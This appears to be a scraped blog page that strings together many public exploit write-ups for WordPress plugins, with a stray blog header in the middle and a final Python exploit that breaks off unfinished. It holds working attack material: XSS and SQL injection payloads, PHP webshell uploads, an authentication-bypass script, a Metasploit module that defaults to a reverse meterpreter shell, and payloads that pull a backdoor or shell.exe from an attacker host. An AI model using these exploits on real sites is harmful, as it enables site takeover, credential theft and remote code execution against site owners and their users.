# Exploit Title: Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)
# Date: 02-17-2022
# Exploit Author: Ceylan Bozoğullarından
# Blog Post: https://bozogullarindan.com/en/2022/01/wordpress-iq-block-country-1.2.13-admin-arbitray-file-deletion-via-zip-slip/
# Software Link: https://en-gb.wordpress.org/plugins/iq-block-country/
# Version: 1.2.12
# Tested on: Linux
# CVE: CVE-2022-0246 (https://wpscan.com/vulnerability/892802b1-26e2-4ce1-be6f-71ce29687776)
# Description:
iQ Block Country is a Wordpress plugin that allows you to limit access to your website content. It can allow or disallow visitors from defined countries to (parts of) the content of the website.
The settings of the plugin can be exported or imported using its backup functionality. An authorized user can import preconfigured settings of the plugin by uploading a zip file. After the uploading process, files in the uploaded zip file are extracted one by one. During the extraction process, existence of a file is checked. If the file exists, it is deleted without any security control by only considering the name of the extracted file. This behavior leads to “Zip Slip” vulnerability.
Zip Slip can cause damage by overwriting configuration files or other sensitive resources. In this finding, An attacker can exploit this vulnerability and the behavior of the extraction process, to delete an arbitrary file in the server. For doing this, it is enough to upload a zip file containing a file that is named as the path of a file which is desired to be deleted.
The details of the discovery are given below.
# Steps To Reproduce:
1. Install and activate the iQ Block Country plugin.
2. Create a test file in the vulnerable system: (e.g. /var/www/html/test.txt)
3. Create a zip file containing a file named as ../../../../test.txt. Absolute path at the end of this process will be: /var/www/html/wp-content/uploads/2022/01/../../../../test.txt
4. Go back to the Wordpress, visit Settings > iQ Block Country > Import/Export tab.
5. Click the “Browse” button and choose the zip file which is created in the Step 3.
6. Click the “Restore settings” button.
7. “Invalid file” message will be appeared but nevermind the message. Check whether the test.txt file is deleted or not.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863138711
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 02-02-2022
# Exploit Author: Ahmet Serkan Ari
# Software Link: https://wordpress.org/plugins/ip2location-country-blocker/
# Version: 2.26.7
# Tested on: Linux
# CVE: N/A
# Thanks: Ceylan Bozogullarindan
# Description:
IP2Location Country Blocker is a plugin enables user to block unwanted traffic from accesing Wordpress frontend (blog pages) or backend (admin area) by countries or proxy servers. It helps to reduce spam and unwanted sign ups easily by preventing unwanted visitors from browsing a particular page or entire website.
An authenticated user is able to inject arbitrary Javascript or HTML code to the "Frontend Settings" interface available in settings page of the plugin (Country Blocker), due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin versions prior to 2.26.7 are affected by this vulnerability.
The details of the discovery are given below.
# Steps To Reproduce:
1. Install and activate the IP2Location Country Blocker plugin.
2. Visit the "Frontend Settings" interface available in settings page of the plugin that is named "Country Blocker".
3. Check the "Enable Frontend Blocking" option.
4. Choose the "URL" option for the "Display page when visitor is blocked" setting.
5. Type the payload given below to the "URL" input where is in the "Other Settings" area.
http://country-blocker-testing.com/test#"'><script>alert(document.domain)</script>
6. Click the "Save Changes" button.
7. The XSS will be triggered on the settings page when every visit of an authenticated user.
source: https://www.securityfocus.com/bid/53995/info
Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Invit0r 0.22 is vulnerable; other versions may also be affected.
ders = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)
# Date: 2022-02-04
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/
# Version: 1.2
# Tested on: Windows 11
# CVE: N/A
1. Description:
This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>
source: https://www.securityfocus.com/bid/52739/info
WordPress Integrator is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WordPress Integrator 1.32 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
<!--
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html
Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF
Abstract
A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0014
Tested versions
This issue was successfully tested on the Instagram Feed WordPress Plugin version 1.4.6.2.
Fix
This issue is resolved in Instagram Feed WordPress Plugin version 1.4.7.
Introduction
Instagram Feed is a WordPress plugin to display beautifully clean, customizable, and responsive feeds from multiple Instagram accounts. A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.
Details
The settings page of the Instagram Feed plugin does not perform CSRF checks. It's possible to change all settings in the plugin by making an authenticated administrator perform a request to change the settings (CSRF). It's possible to change the Instagram access token and id to show images of other users. It's also possible to inject malicious JavaScript in the Customize section, to perform Persistent Cross-Site Scripting. Any user visiting the Instagram Feed will be injected with the attackers payload after the CSRF attack.
Proof of Concept
Have an authenticated admin visit a webpage with the following form:
-->
<html>
<body>
<form action="http://<wordpress site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize" method="POST">
<input type="hidden" name="sb_instagram_settings_hidden_field" value="Y" />
<input type="hidden" name="sb_instagram_customize_hidden_field" value="Y" />
<input type="hidden" name="sb_instagram_width" value="100" />
<input type="hidden" name="sb_instagram_width_unit" value="%" />
<input type="hidden" name="sb_instagram_height" value="100" />
<input type="hidden" name="sb_instagram_height_unit" value="%" />
<input type="hidden" name="sb_instagram_background" value="#474747" />
<input type="hidden" name="sb_instagram_sort" value="none" />
<input type="hidden" name="sb_instagram_num" value="20" />
<input type="hidden" name="sb_instagram_cols" value="4" />
<input type="hidden" name="sb_instagram_image_res" value="auto" />
<input type="hidden" name="sb_instagram_image_padding" value="5" />
<input type="hidden" name="sb_instagram_image_padding_unit" value="px" />
<input type="hidden" name="sb_instagram_show_header" value="on" />
<input type="hidden" name="sb_instagram_header_color" value="" />
<input type="hidden" name="sb_instagram_show_btn" value="on" />
<input type="hidden" name="sb_instagram_btn_background" value="" />
<input type="hidden" name="sb_instagram_btn_text_color" value="" />
<input type="hidden" name="sb_instagram_btn_text" value="Load More..." />
<input type="hidden" name="sb_instagram_show_follow_btn" value="on" />
<input type="hidden" name="sb_instagram_folow_btn_background" value="" />
<input type="hidden" name="sb_instagram_follow_btn_text_color" value="" />
<input type="hidden" name="sb_instagram_follow_btn_text" value="Follow on Instagram" />
<input type="hidden" name="sb_instagram_exclude_words" value="" />
<input type="hidden" name="sb_instagram_include_words" value="" />
<input type="hidden" name="sb_instagram_hide_photos" value="" />
<input type="hidden" name="sb_instagram_block_users" value="" />
<input type="hidden" name="sb_instagram_custom_css" value="" />
<input type="hidden" name="sb_instagram_custom_js" value="} });</script><script>alert(1);</script> " />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!-- The Custom JavaScript section will now be saved with the attacker's JavaScript payload. -->
# Exploit Title: WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection
# Exploit Author: sucuri.net @sucurisecurity
# Date: 2017-02-09
# Google Dork : inurl:/wp-content/plugins/insert-php/
# Vendor Homepage: https://fr.wordpress.org/plugins/insert-php/
# Tested on: MSWin32
# Version: <3.3.1
# Explanation : You Can Inject PHP Code INTO Pages via Wordpress REST API Vulnerability
# PoC :
POST http://localhost.com/wp-json/wp/v2/posts/1234 HTTP/1.1
Host: localhost.com
User-Agent: Xploit
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Encoding: gzip,deflate,lzma,sdch
Connection: keep-alive
content-type: application/json
{ "id": "1234ffff", "title": "by Hacker", "content": "[insert_php] include('http[:]//evilhost.com/file/backdoor.php'); [/insert_php][php] include('http[:]//evilhost.com/file/backdoor.php'); [/php]" }
# Reference : https://blog.sucuri.net/2017/02/rce-attempts-against-the-latest-wordpress-rest-api-vulnerability.html
# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive
# Date: june 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 <= 4.2997
# Tested on: Wordpress 5.1.1, PHP 5.6
# CVE : -
## 1. Create a .zip archive with 2 files: index.html, index.php
echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to
http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client < 1.9.4.5
#!/usr/bin/python3
import requests
import json
import argparse
import base64
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(site, username):
json_info = {"iwp_action":"add_site","params":{"username": username}}
try:
return requests.post(site, timeout=5, verify=False,
headers={"User-Agent" : "raphaelrocks"},
data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
)
except Exception as e:
print("[-] HTTP Exploit Error: {}".format(e))
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
args = parser.parse_args()
site_exploit = exploit(args.url, args.username)
if site_exploit and site_exploit.status_code == requests.codes.ok:
cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
if cookie_string:
print("[+] Use Cookies to Login: \n{}".format(cookie_string))
exit(0)
print("[-] Exploit Failed")
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress InfiniteWP Client Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass in the WordPress
InfiniteWP Client plugin to log in as an administrator and execute
arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
The module will attempt to retrieve the original PLUGIN_FILE contents
and restore them after payload execution. If VerifyContents is set,
which is the default setting, the module will check to see if the
restored contents match the original.
Note that a valid administrator username is required for this module.
WordPress >= 4.9 is currently not supported due to a breaking WordPress
API change. Tested against 4.8.3.
},
'Author' => [
'WebARX', # Discovery
'wvu' # Module
],
'References' => [
['WPVDB', '10011'],
['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
],
'DisclosureDate' => '2020-01-14',
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false,
'Targets' => [['InfiniteWP Client < 1.9.4.5', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
))
register_options([
OptString.new('USERNAME', [true, 'WordPress username', 'admin']),
OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
])
register_advanced_options([
OptBool.new('VerifyContents', [false, 'Verify file contents', true])
])
end
def username
datastore['USERNAME']
end
def plugin_file
datastore['PLUGIN_FILE']
end
def plugin_uri
normalize_uri(wordpress_url_plugins, plugin_file)
end
def check
unless wordpress_and_online?
return CheckCode::Unknown('Is the site online and running WordPress?')
end
unless (version = wordpress_version)
return CheckCode::Unknown('Could not detect WordPress version')
end
if Gem::Version.new(version) >= Gem::Version.new('4.9')
return CheckCode::Safe("WordPress #{version} is an unsupported target")
end
vprint_good("WordPress #{version} is a supported target")
check_version_from_custom_file(
normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
/^= ([\d.]+)/,
'1.9.4.5'
)
end
# https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
def auth_bypass
json = {
'iwp_action' => %w[add_site readd_site].sample,
'params' => {'username' => username}
}.to_json
res = send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_backend,
'data' => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
)
unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
end
print_good("Successfully obtained cookie for #{username}")
vprint_status("Cookie: #{cookie}")
cookie
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
print_status("Bypassing auth for #{username} at #{full_uri}")
unless (@cookie = auth_bypass).include?('wordpress_logged_in')
fail_with(Failure::NoAccess, "Could not log in as #{username}")
end
print_good("Successfully logged in as #{username}")
write_and_exec_payload
end
def write_and_exec_payload
print_status("Retrieving original contents of #{plugin_uri}")
contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
unless contents
fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
end
print_good("Successfully retrieved original contents of #{plugin_uri}")
vprint_status('Contents:')
print(contents)
print_status("Overwriting #{plugin_uri} with payload")
unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
end
print_good("Successfully overwrote #{plugin_uri} with payload")
print_status("Requesting payload at #{plugin_uri}")
send_request_cgi({
'method' => 'GET',
'uri' => plugin_uri
}, 0)
restore_contents(contents)
end
def restore_contents(og_contents)
print_status("Restoring original contents of #{plugin_uri}")
unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
end
return unless datastore['VerifyContents']
contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
unless contents == og_contents
fail_with(Failure::UnexpectedReply,
"Current contents of #{plugin_uri} DO NOT match original!")
end
print_good("Current contents of #{plugin_uri} match original!")
end
end
<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l |....###........##...#.....#.| S #
# E |....#.#..........#..#....#..| e #
# D |....#..#.........#..#...#...| u #
# . |....##..##...####...####....| r #
# *----------------------------* #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >> D_x . Made In Algeria . x_Z << #
###########################################
#
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.inboundio.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability
# remote attacker can upload file/shell/backdoor and exec commands.
#
####
# Lines (6... to 20) : csv_uploader.php
####
#
# ExpLO!T :
# -------
$postData = array();
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
/*
[!] creat your shell file =>
_ k3dz.php :
<?php system($_GET['dz']); ?>
[>] Post the exploit
[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
[+] Or upload what you whant ^_^ ...
*/
####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html
?>
# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection
# Exploit Author: Javier Olmedo
# Contact: @jjavierolmedo
# Website: https://sidertia.com
# Date: 2018-08-22
# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce"
# Vendor: WebToffee
# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip
# Affected Version: 1.3.1 and before
# Active installations: +20,000
# Patched Version: update to 1.3.2 version
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64
# CVE: 2019-15092
# References:
# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/
# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787
# 1. Technical Description
# Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code
# Execution through the CSV injection vulnerability. This allows any application user to inject commands
# as part of the fields of his profile and these commands are executed when a user with greater privilege
# exports the data in CSV and opens that file on his machine.
# 2. Vulnerable code
# The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings
# with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection.
# 3. Proof Of Concept (PoC)
# 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads.
# 3.2 Login with a high privileges user and export all users to CSV.
# 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the
# generated file, the command is executed and the shell will run open on the machine.
# 4. Payloads
=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
+cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
# 5. Timeline
# 15, august 2019 - [RESEARCHER] Discover
# 15, august 2019 - [RESEARCHER] Report to Webtoffee support
# 16, august 2019 - [DEVELOPER] More information request
# 16, august 2019 - [RESEARCHER] Detailed vulnerability report
# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability
# 22, august 2019 - [RESEARCHER] Public disclosure
# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In "URL" field to write "../../../wp-config.php".
Validate form and inspect the body.
======================================
# Exploit Title: Wordpress Plugin IMDb Profile Widget - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-26
# Google Dork : inurl:/wp-content/plugins/imdb-widget
# Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
# Tested on: MSWin32
# Version: 1.0.8
# Vuln file : pic.php
<?php
header( 'Content-Type: image/jpeg' );
readfile( $_GET["url"] );
# PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
# Right click -> Save As -> rename pic.jpg in .txt and read file
# 26/03/2016 - Informed Vendor about Issue
# 27/03/2016 - Waiting Reply
# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"
# Date: Thursday, September 1, 2022
# Exploit Author: ABDO10
# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/
# Software Link: https://github.com/orangelabweb/imagemagick-engine/
# Version: <= 1.7.4
# Tested on: windows 10
-- vulnerable section
https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529
-- payload on windows: d&calc.exe&anything
-- on unix : notify-send "done"
-- exploit :
GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]
HTTP/1.1
Host: localhost
Cookie: wordpress_sec_xx=; wp-settings-time-1=;
wordpress_test_cookie=; wordpress_logged_in_xx=somestuff
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)
Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost
download.php file code:
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
$file = $_GET['file'];
header( 'Content-Type: application/zip' );
header( 'Content-Disposition: attachment; filename="' . $file . '"' );
readfile( $file );
unlink( $file );
exit;
}
?>
Proof of concept:
Note that because of the unlink, we potentially can destroy the wordpress core.
Simply add the get parameter file:
localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
Found by AMAR^SHG (Shkupi Hackers Group)
# Exploit Title: iLive - Intelligent WordPress Live Chat Support
Plugin v1.0.4 Stored XSS Injection
# Google Dork: -
# Date: 2019/06/25
# Exploit Author: m0ze
# Vendor Homepage: http://www.ilive.wpapplab.com/
# Software Link:
https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563
http://www.ilive.wpapplab.com/
# Version: 1.0.4
# Tested on: Windows 10 / Parrot OS
# CVE : -
Info:
Weak security measures like bad textarea data filtering has been
discovered in the «iLive - Intelligent WordPress Live Chat Support
Plugin». Current version of this premium WordPress plugin is 1.0.4.
PoC:
Go to the demo website http://www.site.com/ and open chat window by clicking on «Chat» icon on the bottom right corner.
Use your payload inside input field and press [Enter].
Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other website.
To check your XSS Injections log in http://www.site.com/wp-admin/ and go to this page http://www.site.com/wp-admin/admin.php?page=ilive-chat-page then select your chat alias from the list. Keep in mind that there is 3 demo operators, so you must log in as operator assigned to your chat (operator number will be available after you send the first message in chat).
Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
Example #2: <img src=https://i.imgur.com/zRm8R9z.gif
onload=alert(document.cookie);>
Example #3: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
Example #4: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
Example #5: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
source: https://www.securityfocus.com/bid/53522/info
The iFrame Admin Pages plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
iFrame Admin Pages 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/iframe-admin-pages/main_page.php POST DATA: url="><script>alert(1)</script>&newiframe=new&servicerequest=new
# Exploit Title: IBPS Online Exam Plugin for WordPress v1.0 - XSS SQLi
# Date: 2017-07-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://elfemo.com/demo/server2/order2032/
# Software Link: https://codecanyon.net/item/ibps-online-exam-plugin-for-wordpress/20028534
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-07-20
Product & Service Introduction:
===============================
A Full Featured WordPress Plugin for IBPS Examination.
Technical Details & Description:
================================
Stored XSS on exam input textfields.
Blind SQL Injection on examapp_UserResult page id parameter.
Proof of Concept (PoC):
=======================
Authenticated Stored XSS:
Logged as a student:
Write the payload in the input textfields while attempting an exam. The payload will execute on My Results > View Details:
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=[xx]
Blind SQL Injection
Logged as a student:
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=examapp_UserResult&info=view&id=78 AND 6705=6705
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: page=examapp_UserResult&info=view&id=-4748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6b4c5247597261614e73447378544741764b4f7172597a5a58494551685a7056644d6e595773496e,0x7162787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KttP
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover)
# Date: 2019-07-24
# Vendor Homepage: http://wordpress.framework-y.com
# Software Link: http://wordpress.framework-y.com/hybrid-composer/
# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452
# Affected version: <= 1.4.6
# Researcher: rootetsy
# Exploit Author: yasin
# Tested on: Linux
# Vulnerability discovered by rootetsy
# Summary
The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table.
# Description
A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities.
index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action.
# Usage: python exploit.py
###########################################################
import httplib, urllib
import sys
import random
# pip install httplib urllib random
site = raw_input("[+] Target: ")
url = "/wp-admin/admin-ajax.php"
